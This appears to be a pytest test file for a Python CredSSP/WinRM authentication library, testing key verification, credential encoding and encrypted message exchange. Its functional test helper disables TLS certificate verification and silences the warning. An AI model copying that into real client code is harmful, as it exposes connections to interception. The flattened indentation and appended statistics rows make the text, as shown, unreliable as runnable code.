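    # the server instead returns the SHA256 server-to-client binding hash.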
def test_verify_pub_key_old(self):
credssp = CredSSPContext("", "", "")
nonce = None
response_key = b"\x31\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
credssp._verify_public_keys(nonce, response_key, public_key)
def test_verify_pub_key_old_mismatch(self):
credssp = CredSSPContext("", "", "")
nonce = None
response_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
with pytest.raises(AuthenticationException) as exc:
credssp._verify_public_keys(nonce, response_key, public_key)
assert str(exc.value) == "Could not verify key sent from the " \
"server, potential man in the middle attack"
def test_verify_pub_key_new(self):
credssp = CredSSPContext("", "", "")
nonce = b"\x02\xce\xee\x0c\xdf\x03\x49\x30" \
b"\xc7\x55\xd7\xdd\x4a\x8a\xda\xaf" \
b"\xeb\x7e\x78\x9d\x86\x9c\xb2\xb8" \
b"\xd7\x9f\x71\x0c\xe2\x83\x72\x4d"
response_key = b"\xde\x4f\xc6\xa6\xba\xb2\x0e\xc5" \
b"\x29\x6e\x8d\xe5\xe7\x84\xc7\x11" \
b"\xef\xb8\xe4\xd0\xc3\x39\x4f\x4b" \
b"\xb9\x64\xbd\xff\xf1\xc0\xb8\xc2"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
credssp._verify_public_keys(nonce, response_key, public_key)
def test_verify_pub_key_new_mismatch(self):
credssp = CredSSPContext("", "", "")
nonce = b"\x02\xce\xee\x0c\xdf\x03\x49\x30" \
b"\xc7\x55\xd7\xdd\x4a\x8a\xda\xaf" \
b"\xeb\x7e\x78\x9d\x86\x9c\xb2\xb8" \
b"\xd7\x9f\x71\x0c\xe2\x83\x72\x4d"
response_key = b"\xdf\x4f\xc6\xa6\xba\xb2\x0e\xc5" \
b"\x29\x6e\x8d\xe5\xe7\x84\xc7\x11" \
b"\xef\xb8\xe4\xd0\xc3\x39\x4f\x4b" \
b"\xb9\x64\xbd\xff\xf1\xc0\xb8\xc2"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
with pytest.raises(AuthenticationException) as exc:
credssp._verify_public_keys(nonce, response_key, public_key)
assert str(exc.value) == "Could not verify key sent from the " \
"server, potential man in the middle attack"
def test_get_encrypted_credentials(self):
class FakeContext(object):
def __init__(self):
self.username = "domain\\username"
self.password = "password"
def wrap(self, data):
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
expected = b"\x30\x52" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa2\x4b" \
b"\x04\x49" \
b"\x30\x43" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x01" \
b"\xa1\x3c" \
b"\x04\x3a" \
b"\x30\x38" \
b"\xa0\x0e" \
b"\x04\x0c" \
b"\x64\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00" \
b"\xa1\x12" \
b"\x04\x10" \
b"\x75\x00\x73\x00\x65\x00\x72\x00" \
b"\x6e\x00\x61\x00\x6d\x00\x65\x00" \
b"\xa2\x12" \
b"\x04\x10" \
b"\x70\x00\x61\x00\x73\x00\x73\x00" \
b"\x77\x00\x6f\x00\x72\x00\x64\x00" \
b"\x00\x00\x00\x00"
actual = credssp._get_encrypted_credentials(context)
assert actual == expected
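    # Decoding note (illustrative): the expected blob is a DER-encoded
    # TSRequest (version 6) whose authInfo carries a TSCredentials with
    # credType 1 (password) and UTF-16-LE domain/user/password fields, e.g.
    #
    #     "domain".encode("utf-16-le")
    #     # -> b"d\x00o\x00m\x00a\x00i\x00n\x00"
    #
    # matches the bytes under the \xa0\x0e tag above. The four trailing
    # NUL bytes come from FakeContext.wrap, which appends b"\x00" * 4 to
    # stand in for the wrapping overhead of a real security context.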
class TestHttpCredSSPAuth(object):
def test_check_credssp_supported(self):
response = requests.Response()
response.headers['www-authenticate'] = "CredSSP"
HttpCredSSPAuth._check_credssp_supported(response)
def test_check_credssp_supported_multiple(self):
response = requests.Response()
response.headers['www-authenticate'] = "Negotiate, Credssp, " \
"Realm='WSMan'"
HttpCredSSPAuth._check_credssp_supported(response)
def test_check_credssp_supported_fail(self):
response = requests.Response()
response.headers['www-authenticate'] = "Negotiate"
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._check_credssp_supported(response)
assert str(exc.value) == "The server did not response CredSSP being " \
"an available authentication method - " \
"actual: 'Negotiate'"
def test_set_credssp_token(self):
request = requests.Request('GET', '')
expected = b"CredSSP YWJj"
HttpCredSSPAuth._set_credssp_token(request, b"abc")
actual = request.headers['Authorization']
assert actual == expected
def test_get_credssp_token(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
response.headers['www-authenticate'] = "CredSSP YWJj"
expected = b"abc"
actual = HttpCredSSPAuth._get_credssp_token(response, pattern,
"step 1")
assert actual == expected
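    # Illustrative: the token is plain base64, and
    # base64.b64encode(b"abc") == b"YWJj", so the header above round-trips
    # back to b"abc". (Assumes the standard base64 module; the actual
    # decode presumably happens inside _get_credssp_token.)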
def test_get_credssp_token_fail_no_header(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._get_credssp_token(response, pattern, "step 1")
assert str(exc.value) == "Server did not response with a CredSSP " \
"token after step step 1 - actual ''"
def test_get_credssp_token_fail_no_credssp_token(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
response.headers['www-authenticate'] = "NTLM YWJj"
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._get_credssp_token(response, pattern, "step 1")
assert str(exc.value) == "Server did not response with a CredSSP " \
"token after step step 1 - actual 'NTLM YWJj'"
def test_assert_warning_tls_context(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.tls_context = value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.tls_context == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property tls_context, this property should be " \
"accessed using the host context, " \
"credssp['hostname'].tls_context"
def test_assert_warning_tls_connection(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.tls_connection = value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.tls_connection == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property tls_connection, this property " \
"should be accessed using the host context, " \
"credssp['hostname'].tls_connection"
def test_assert_warning_cipher_negotiated(self):
class CredSSPContextTest(object):
def __init__(self, value):
class TlsConnection(object):
def __init__(self, value):
self.value = value
def get_cipher_name(self):
return self.value
self.tls_connection = TlsConnection(value)
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.cipher_negotiated == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property cipher_negotiated, this property " \
"should be accessed using the host context, " \
"credssp['hostname'].tls_connection.get_cipher_name()"
def test_assert_warning_wrap(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.value = value
def wrap(self, data):
return self.value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest(b"a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.wrap(b"") == b"a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated function, wrap should be accessed using the " \
"host context wrap function, credssp['hostname'].wrap()"
def test_assert_warning_unwrap(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.value = value
def unwrap(self, data):
return self.value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest(b"a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.unwrap(b"") == b"a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated function, unwrap should be accessed using the " \
"host context unwrap function, credssp['hostname'].unwrap()"
class TestHttpCredSSPAuthFunctional(object):
@pytest.fixture(scope='class', autouse=True)
def runner(self):
server = os.environ.get('CREDSSP_SERVER', None)
username = os.environ.get('CREDSSP_USERNAME', None)
password = os.environ.get('CREDSSP_PASSWORD', None)
if username and password and server:
return server, username, password
else:
pytest.skip("CREDSSP_USERNAME, CREDSSP_PASSWORD, CREDSSP_SERVER "
"environment variables were not set, integration tests"
" will be skipped")
def test_credssp_with_success_http(self, runner):
test_url = "http://%s:5985/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2])
# try to parse the XML response; this will fail if the decryption failed
ET.fromstring(actual)
def test_credssp_with_success_https(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2])
# try to parse the XML response; this will fail if the decryption failed
ET.fromstring(actual)
def test_credssp_with_wrong_credentials(self, runner):
# Wrong password, expect NTStatusException
test_url = "https://%s:5986/wsman" % runner[0]
with pytest.raises(NTStatusException) as exc:
self._send_request(test_url, runner[1], "fakepass")
assert str(exc.value) == "Received error status from the server: " \
"(3221225581) STATUS_LOGON_FAILURE 0xc000006d"
def test_credssp_minimum_client_fail(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
with pytest.raises(AuthenticationException) as exc:
self._send_request(test_url, runner[1], runner[2],
minimum_version=100)
assert "did not meet the minimum requirements of 10" in str(exc.value)
def test_credssp_with_ntlm_explicit(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2],
auth_mech="ntlm")
# try to parse the XML response; this will fail if the decryption failed
ET.fromstring(actual)
def _send_request(self, url, username, password, auth_mech="auto",
minimum_version=2):
"""
Sends a request to the URL with the specified credentials. Also tries
to send an encrypted config request and returns the decrypted response.
"""
from urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', category=InsecureRequestWarning)
session = requests.Session()
session.verify = False
session.auth = HttpCredSSPAuth(username, password,
auth_mechanism=auth_mech,
minimum_version=minimum_version)
request = requests.Request('POST', url, data='')
request.headers['Content-Type'] = 'application/soap+xml;charset=UTF-8'
request.headers['User-Agent'] = 'Python WinRM client'
prepared_request = session.prepare_request(request)
response = session.send(prepared_request)
assert response.status_code == 200, \
"Failed to authenticate with CredSSP to %s" % url
response.raise_for_status()
hostname = next(iter(session.auth.contexts))
context = session.auth.contexts[hostname]
config_message = """
<s:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:i="http://schemas.microsoft.com/wbem/wsman/1/cim/interactive.xsd" xmlns:wsmanfault="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identify/1/wsmanidentity.xsd" xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy" xmlns:plugin="http://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cert="http://schemas.microsoft.com/wbem/wsman/1/config/service/certmapping" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:m="http://schemas.microsoft.com/wbem/wsman/1/machineid" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:sub="http://schemas.microsoft.com/wbem/wsman/1/subscription" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">
<s:Header>
<p:SessionId s:mustUnderstand="false">uuid:11111111-1111-1111-1111-111111111111</p:SessionId>
<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</a:Action>
<a:To>%s</a:To>
<a:MessageID>uuid:11111111-1111-1111-1111-111111111111</a:MessageID>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/config</w:ResourceURI>
<w:Locale xml:lang="en-US" s:mustUnderstand="false"/>
<w:MaxEnvelopeSize>153600</w:MaxEnvelopeSize>
<w:OperationTimeout>PT20S</w:OperationTimeout>
<p:DataLocale xml:lang="en-US" s:mustUnderstand="false"/>
</s:Header>
<s:Body/>
</s:Envelope>""" % (url)
encrypted_message = context.wrap(config_message.encode('utf-8'))
trailer_length = self._get_trailer_length(
len(config_message), context.tls_connection.get_cipher_name()
)
message_payload = \
b"--Encrypted Boundary\r\n" \
b"\tContent-Type: application/HTTP-CredSSP-session-encrypted\r\n" \
b"\tOriginalContent: " \
b"type=application/soap+xml;charset=UTF-8;Length=" + \
str(len(config_message)).encode() + \
b"\r\n" \
b"--Encrypted Boundary\r\n" \
b"\tContent-Type: application/octet-stream\r\n" + \
struct.pack("<i", trailer_length) + encrypted_message + \
b"--Encrypted Boundary--\r\n"
request = requests.Request('POST', url, data=message_payload)
prepared_request = session.prepare_request(request)
prepared_request.headers['Content-Length'] = \
str(len(prepared_request.body))
prepared_request.headers['Content-Type'] = \
'multipart/encrypted;' \
'protocol="application/HTTP-CredSSP-session-encrypted";' \
'boundary="Encrypted Boundary"'
response = session.send(prepared_request)
assert response.status_code == 200, \
"Failed to send valid encrypted message to %s" % url
encrypted_response = response.content.split(b'--Encrypted Boundary')[2]
encrypted_payload = \
encrypted_response.split(b'application/octet-stream\r\n')[1]
decrypted_response = context.unwrap(encrypted_payload[4:])
return decrypted_response
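    # Framing note (illustrative): each encrypted chunk is prefixed with a
    # 4-byte little-endian trailer/signature length, e.g.
    #
    #     struct.pack("<i", 28) == b"\x1c\x00\x00\x00"
    #
    # and the response parsing above skips those same four bytes
    # (encrypted_payload[4:]) before calling unwrap.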
def _get_trailer_length(self, message_length, cipher_suite):
# I really don't like the way this works, but I can't find a better way.
# MS allows you to get this info through the SecPkgContext_StreamSizes
# struct, but there is no GSSAPI/OpenSSL equivalent, so we need to
# calculate it ourselves.
if re.match(r'^.*-GCM-[\w\d]*$', cipher_suite):
# We are using GCM for the cipher suite; GCM has a fixed TLS trailer
# length of 16 bytes, which makes this easy for us
trailer_length = 16
else:
# We are not using GCM, so we need to calculate the trailer size. The
# trailer length equals the length of the HMAC plus the length of the
# padding required by the block cipher
hash_algorithm = cipher_suite.split('-')[-1]
# while there are other algorithms, SChannel doesn't support them
# as of yet https://msdn.microsoft.com/en-us/library/windows/desktop/aa374757(v=vs.85).aspx
if hash_algorithm == 'MD5':
hash_length = 16
elif hash_algorithm == 'SHA':
hash_length = 20
elif hash_algorithm == 'SHA256':
hash_length = 32
elif hash_algorithm == 'SHA384':
hash_length = 48
else:
hash_length = 0
pre_pad_length = message_length + hash_length
if "RC4" in cipher_suite:
# RC4 is a stream cipher so no padding would be added
padding_length = 0
elif "3DES" in cipher_suite:
# 3DES is a 64 bit block cipher
padding_length = 8 - (pre_pad_length % 8)
else:
# AES is a 128 bit block cipher
padding_length = 16 - (pre_pad_length % 16)
trailer_length = (pre_pad_length + padding_length) - message_length
return trailer_length
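    # Worked examples for _get_trailer_length (illustrative only):
    #   'ECDHE-RSA-AES256-GCM-SHA384' matches the GCM branch -> trailer = 16
    #   'ECDHE-RSA-AES256-SHA' with a 100 byte message:
    #       hash_length = 20 (SHA), pre_pad_length = 120,
    #       AES padding = 16 - (120 % 16) = 8 -> trailer = 20 + 8 = 28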
| 49.621675
| 1,280
| 0.499841
| 6,687
| 50,366
| 3.7048
| 0.094661
| 0.013563
| 0.017438
| 0.019375
| 0.786268
| 0.765561
| 0.74885
| 0.722734
| 0.703278
| 0.682974
| 0
| 0.160714
| 0.350177
| 50,366
| 1,014
| 1,281
| 49.670611
| 0.59623
| 0.031053
| 0
| 0.742373
| 0
| 0.00678
| 0.405244
| 0.304497
| 0
| 0
| 0.000615
| 0
| 0.054237
| 1
| 0.062147
| false
| 0.00904
| 0.012429
| 0.00904
| 0.106215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
